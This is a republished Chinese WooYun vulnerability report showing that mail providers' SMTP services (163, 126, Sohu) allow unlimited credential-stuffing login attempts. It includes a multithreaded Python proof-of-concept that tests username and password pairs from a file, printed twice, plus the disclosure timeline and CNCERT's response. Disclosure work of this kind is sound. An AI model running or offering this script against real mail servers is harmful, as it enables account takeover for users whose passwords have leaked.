某基础服务可以被利用无限制撞库很多大公司受影响

admin 2015年5月23日21:06:21评论397 views字数 261阅读0分52秒阅读模式
摘要

2014-08-17: 细节已通知厂商并且等待厂商处理中
2014-08-20: 厂商已经确认,细节仅向厂商公开
2014-08-30: 细节向核心白帽子及相关领域专家公开
2014-09-09: 细节向普通白帽子公开
2014-09-19: 细节向实习白帽子公开
2014-09-29: 厂商已经修复漏洞并主动公开,细节向公众公开

漏洞概要 关注数(15) 关注此漏洞

缺陷编号: WooYun-2014-72537

漏洞标题: 某基础服务可以被利用无限制撞库很多大公司受影响

相关厂商: 互联网应急响应中心

漏洞作者: latershow

提交时间: 2014-08-17 16:34

修复时间: 2014-09-29 19:50

公开时间: 2014-09-29 19:50

漏洞类型: 敏感信息泄露

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无限撞库

2人收藏


漏洞详情

披露状态:

2014-08-17: 细节已通知厂商并且等待厂商处理中
2014-08-20: 厂商已经确认,细节仅向厂商公开
2014-08-30: 细节向核心白帽子及相关领域专家公开
2014-09-09: 细节向普通白帽子公开
2014-09-19: 细节向实习白帽子公开
2014-09-29: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

某基础服务可以被利用无限制撞库,很多大公司受影响

详细说明:

Smtp如果开启的话可被利用无限制撞库

很多大型公司的账号体系是和邮箱打通的,他们在网站登录处部署重兵防止撞库,但是smtp上却没有做防护

几个大公司的smtp服务器:

http://**.**.**.**/hssdw25172008/article/details/8729469

poc代码:

code 区域
#! /usr/bin/env python
#coding=utf-8

import smtplib
import threading
import time

smtp_server = "**.**.**.**"
alive_thread = 0

def send_email(user, pwd):
global alive_thread
try:
s = smtplib.SMTP()
s.connect(smtp_server)
s.login(user, pwd)
s.close()
print "%s %s login sucess" % (user,pwd)
except Exception, e:
print "%s %s login failed" % (user,pwd)
threading.Lock()
alive_thread -= 1
threading.RLock()

if __name__ == "__main__":
print smtp_server
fl = open("D:/163.txt","r")
for x in fl.readlines():
pts = x.split(" ")
if len(pts)==2:
while (alive_thread>500):
time.sleep(1)
threading.Lock()
alive_thread +=1
threading.RLock()
threading.Thread(target=send_email,args=(pts[0].strip(),pts[1].strip())).start()
pass

漏洞证明:

Sohu:

某基础服务可以被利用无限制撞库很多大公司受影响

QQ试了一下,发现不成功,根据报错搜了一下,原因是smtp 默认未开启:

某基础服务可以被利用无限制撞库很多大公司受影响

126、163 smtp默认开启:

某基础服务可以被利用无限制撞库很多大公司受影响

某基础服务可以被利用无限制撞库很多大公司受影响

某基础服务可以被利用无限制撞库很多大公司受影响

某基础服务可以被利用无限制撞库很多大公司受影响

问题很严重,不敢耽搁,赶紧来提wooyun,很多公司都存在这个问题。

漏洞证明:

Smtp如果开启的话可被利用无限制撞库

很多大型公司的账号体系是和邮箱打通的,他们在网站登录处部署重兵防止撞库,但是smtp上却没有做防护

几个大公司的smtp服务器:

http://**.**.**.**/hssdw25172008/article/details/8729469

poc代码:

code 区域
#! /usr/bin/env python
#coding=utf-8

import smtplib
import threading
import time

smtp_server = "**.**.**.**"
alive_thread = 0

def send_email(user, pwd):
global alive_thread
try:
s = smtplib.SMTP()
s.connect(smtp_server)
s.login(user, pwd)
s.close()
print "%s %s login sucess" % (user,pwd)
except Exception, e:
print "%s %s login failed" % (user,pwd)
threading.Lock()
alive_thread -= 1
threading.RLock()

if __name__ == "__main__":
print smtp_server
fl = open("D:/163.txt","r")
for x in fl.readlines():
pts = x.split(" ")
if len(pts)==2:
while (alive_thread>500):
time.sleep(1)
threading.Lock()
alive_thread +=1
threading.RLock()
threading.Thread(target=send_email,args=(pts[0].strip(),pts[1].strip())).start()
pass

漏洞证明:

Sohu:

某基础服务可以被利用无限制撞库很多大公司受影响

QQ试了一下,发现不成功,根据报错搜了一下,原因是smtp 默认未开启:

某基础服务可以被利用无限制撞库很多大公司受影响

126、163 smtp默认开启:

某基础服务可以被利用无限制撞库很多大公司受影响

某基础服务可以被利用无限制撞库很多大公司受影响

某基础服务可以被利用无限制撞库很多大公司受影响

某基础服务可以被利用无限制撞库很多大公司受影响

问题很严重,不敢耽搁,赶紧来提wooyun,很多公司都存在这个问题。

修复方案:

给礼物我再告诉你

版权声明:转载请注明来源 latershow@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-08-20 10:08

厂商回复:

对于所述案例的撞库风险,需要各厂商拟定防护规则进行限定,暂无法一一处置。先行确认并公开。

最新状态:

2014-08-20:公开。


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 这个处置起来有点难度,因为各邮件系统是支持pop3和stmp客户端收发的。

  2. 2014-08-15 17:38 | latershow ( 路人 | Rank:24 漏洞数:6 | andr0day)

    0

    可以默认关闭

  3. 2014-08-15 18:03 | 黑色的屌丝 ( 实习白帽子 | Rank:39 漏洞数:6 | →_→→_→)

    0

    @cncert国家互联网应急中心 是smtp >>stmp

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin